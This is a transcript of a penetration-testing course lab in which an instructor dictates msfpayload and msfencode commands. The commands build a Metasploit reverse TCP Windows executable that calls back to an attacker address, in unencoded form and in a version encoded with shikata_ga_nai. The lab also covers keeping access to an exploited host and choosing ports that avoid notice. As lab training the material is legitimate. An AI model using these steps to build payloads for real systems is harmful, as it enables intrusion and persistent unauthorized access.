Alright, in this lab, Module 8, Lab 7a, we're going to create our executable binary which we will use on our target system. We have already exploited the Net API service and we've gained access to this Windows system. But at this point in time, we don't want to have to continuously re-exploit that same system for a couple of reasons. One, the time consumption behind doing that over and over, and two, you never know when you might get identified or recognized and the administrators prevent your access from getting back onto the network the same route you took, which takes more time now to actually try to find another exploitation to get back onto the system. If we go this route and we create some malware and executable binary, we're able to simply have the target system, in this instance, connect back to us. Saves a lot of time, saves a lot of trouble. To do this, we're going to have a couple new pieces of Metasploit that we're going to work with, which is Msf Payload and msfencode. Payload allows us to use any of those payloads that we were injecting through vulnerable services and actually generate unencoded binaries, which we can now plant and do the work. msfencode is actually going to allow us to encode any of these binaries that we try to create into multiple programming languages in order to install it. There's some advantages to it which I don't want to give away yet. You will experience those as we move through further labs here. First thing we're going to want to do, confirm that your attack system is sitting in a host-only environment. If you are not in a host-only environment, please change that to host-only, and you can either reboot the system or restart your networking services. Once you're here at your desktop, we will use root tor to get into the system unless you've changed your credentials. Once you're at your desktop, we will open up terminal window, and I'm going to cd to desktop, cd being change directory to the desktop. Type in mkdir malware, make directory titled malware. You're going to see that create in the background here on your desktop. And we'll go ahead and run. Now we can go ahead and type in msf payload windows /interpreter /reverse _TCP space capital S. This is one of the payloads that is listed within Metasploit. It's creating a reverse TCP connection, so from a target back to the attack system. Msf Payload is basically going to pull up this exploit or review this exploit real quick, and capital S is asking to display to us what fields need to be set. If you think about our options, every time we create a payload there's options associated to it. This is going to display those options for us so we can see what we need to set prior to actually generating an unencoded payload. And as you can see here, we have an lhost address listed as our loopback, our local address, so who we are. That's not going to work. And an L port of 4444. I'm going to change that port to something a little higher, and it gives you a description down here of what this payload's actually going to do. Inject an interpreter server DLL via the reflective DLL injection payload. So this is a staged attack. This will connect back to the attacker. Now, understanding what it is that we need to set, let's do one thing. We're going to come over here and run an Ifconfig. Let's confirm we know our IP address, so we're looking at 192.168. Yours will probably differ right here, but mine's a 40.131. We'll head back over here, and we're going to type in msf payload. This is going to be a long command, so bear with me here. Windows /interpreter /reverse _TCP. We want to specify the lhost, our address, with an equal sign, 192.168.40.131. We want to specify the L port, equal sign. I'm going to make it 30,000. Normally you would leave this a lower level port in case somebody ran a netstat. You wouldn't want this to stand out as a real obvious weird connection from one of those high level ports. For the case of this lab, for the sake of what we're doing here, we're going to make it 30,000, and when we do our encoded, we'll make it something like 25,000, just so we can see them and they will stand out to us. From here, we need to say, I want you to execute and output this to our malware directory, and I want you to entitle it unencoded hyphen, and then put your last name here, .exe. Hit enter. That might take just a moment for that to generate. So here we go. We have success. We see that our options were set. Now basically what we've done is we've created an unencoded Windows binary. So we set the required options for it to connect back to us on a specific port, and we have named this unencoded dash our last name so that we don't get things confused inside our malware directory. If you notice here though, we have not set an rhost option. The reason being is this is going to get installed on the rhost. This is going to get installed on the device that's actually going to be connecting back to us, so it will simply use its local network connection, what it has available to it, to connect back, so therefore we don't have to specify it. The exploit itself already specifies the port as 445, so we're good to go there. Let's do a cd malware. So we're going to change our directory. Let's do an ls, and we see that we have our exe listed inside there. Now let's go ahead and create an encoded malware. So to do this, we can work right here from this current directory. One of the nice things about Kali, pretty much can work with a lot of your original here. Msf Payload, we're going to use the same payload here. Our L host will be the same, but our L port's going to change. We'll make this 25,000. Now here's where things get a little different. We're going to use a capital R, space, and then pipe. Now let me show you real quick if you're not sure what this pipe key is. You're looking at your keyboard here, you're going to have this key right here. This guy with this dash up and down, along with the backslash on the keyboard. Hold your shift key, hit this key, you're going to get the pipe key. Pipe key should generate a character that looks very similar to that. Do a space, and now we're going to do msfencode. Now we're going to actually encode -E. It's going to be an x86 type encoding / countdown space -C space 2 space -T space raw space, you're going to use that pipe one more time, space msf encode space -X space -T exe space -E. We're almost done. x86 / shikata _ga _nai space -C number 3 -K -O. This is the file name here. We're going to do encoded - your last name, and you notice I didn't put the malware directory in the front because we are still working in the malware directory. Long command. Let's go ahead and hit enter, and this looks excellent. Looks like everything succeeded. Now if you just ran that command and you received something similar to buff equal, you probably have a typo somewhere back within your command, so go back and double check. Now we can perform an ls. Now we have an encoded and an unencoded. We can open this way as well and see that we have the two files listed in here. At this point in time, we are good to go. That is the completion of this lab, but this is your deliverable. What you're going to want to do is perform this command, and from within the directory, show me an ls. Have this opened as well. and show me your two files created in the directory. Take your screenshot of that. Remember, I want date and time within your response. Submit that as part of your lab. Excellent job.